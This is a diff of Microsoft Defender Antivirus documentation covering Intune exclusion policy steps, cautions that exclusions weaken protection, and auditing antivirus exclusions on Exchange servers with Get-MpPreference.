+6. On the **Scope tags** tab, if you're using scope tags in your organization, specify scope tags for the policy you're creating. (See [Scope tags](/mem/intune/fundamentals/scope-tags).)

+

+7. On the **Assignments** tab, specify the users and groups to whom your policy should be applied, and then choose **Next**. (If you need help with assignments, see [Assign user and device profiles in Microsoft Intune](/mem/intune/configuration/device-profile-assign).)

+

+8. On the **Review + create** tab, review the settings, and then choose **Create**.

+

+## Important points about exclusions

+

+Defining exclusions lowers the protection offered by Microsoft Defender Antivirus. You should always evaluate the risks that are associated with implementing exclusions, and you should only exclude files that you're confident aren't malicious.

+

+Exclusions directly affect the ability for Microsoft Defender Antivirus to block, remediate, or inspect events related to the files, folders, or processes that are added to the exclusion list. Custom exclusions can affect features that are directly dependent on the antivirus engine (such as protection against malware, [file IOCs](indicator-file.md), and [certificate IOCs](indicator-certificates.md)). Process exclusions also affect [network protection](network-protection.md) and [attack surface reduction (ASR) rules](attack-surface-reduction.md). Specifically, a process exclusion on any platform causes network protection and ASR to be unable to inspect traffic or enforce rules for that specific process.

Keep the following points in mind when you're defining exclusions: -- Exclusions are technically a protection gap. Consider all your options when defining exclusions. Other options can be as simple as making sure the excluded location has the appropriate access-control lists (ACLs) or setting policies to audit mode at first.

+- Exclusions are technically a protection gap. Consider all your options when defining exclusions. See [Submissions, suppressions, and exclusions](defender-endpoint-antivirus-exclusions.md#submissions-suppressions-and-exclusions).

-- Review the exclusions periodically. Recheck and re-enforce mitigations as part of your review process.

+- Review exclusions periodically. Recheck and re-enforce mitigations as part of your review process.

-- Ideally, avoid defining exclusions in an effort to be proactive. For example, don't exclude something just because you think it might be a problem in the future. Use exclusions only for specific issues, such as those pertaining to performance or application compatibility that exclusions could mitigate.

+- Ideally, avoid defining exclusions in an attempt to be proactive. For example, don't exclude something just because you think it might be a problem in the future. Use exclusions only for specific issues, such as those pertaining to performance or application compatibility that exclusions could mitigate.

- Review and audit changes to your list of exclusions. Your security team should preserve context around why a certain exclusion was added to avoid confusion later on. Your security team should be able to provide specific answers to questions about why exclusions exist.

-## Audit Antivirus Exclusions

+## Audit antivirus exclusions on Exchange systems

-Exchange has supported integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It's highly recommended to ensure these updates are installed and AMSI is working using the guidance provided by the Exchange Team as this integration allows the best ability for Defender Antivirus to detect and block exploitation of Exchange.

+Microsoft Exchange has supported integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange (see [Running Windows antivirus software on Exchange servers](/exchange/antispam-and-antimalware/windows-antivirus-software)). It's highly recommended to install these updates and make sure that AMSI is working properly. See [Microsoft Defender Antivirus security intelligence and product updates](microsoft-defender-antivirus-updates.md).

-Many organizations exclude the Exchange directories from antivirus scans for performance reasons. Microsoft recommends auditing AV exclusions on Exchange systems and assessing if they can be removed without impacting performance in your environment to ensure the highest level of protection. Exclusions can be managed by using Group Policy, PowerShell, or systems management tools like Microsoft Endpoint Configuration Manager.

+Many organizations exclude the Exchange directories from antivirus scans for performance reasons. Microsoft recommends auditing Microsoft Defender Antivirus exclusions on Exchange systems and assessing whether exclusions can be removed without impacting performance in your environment to ensure the highest level of protection. Exclusions can be managed by using Group Policy, PowerShell, or systems management tools like Microsoft Intune.

-To audit AV exclusions on an Exchange Server running Defender Antivirus, run the **Get-MpPreference** command from an elevated PowerShell prompt.

+To audit Microsoft Defender Antivirus exclusions on an Exchange Server, run the **Get-MpPreference** command from an elevated PowerShell prompt. (See [Get-MpPreference](/powershell/module/defender/get-mppreference).)

-If exclusions can't be removed for the Exchange processes and folders, running a Quick Scan in Defender Antivirus scans the Exchange directories and files, regardless of exclusions.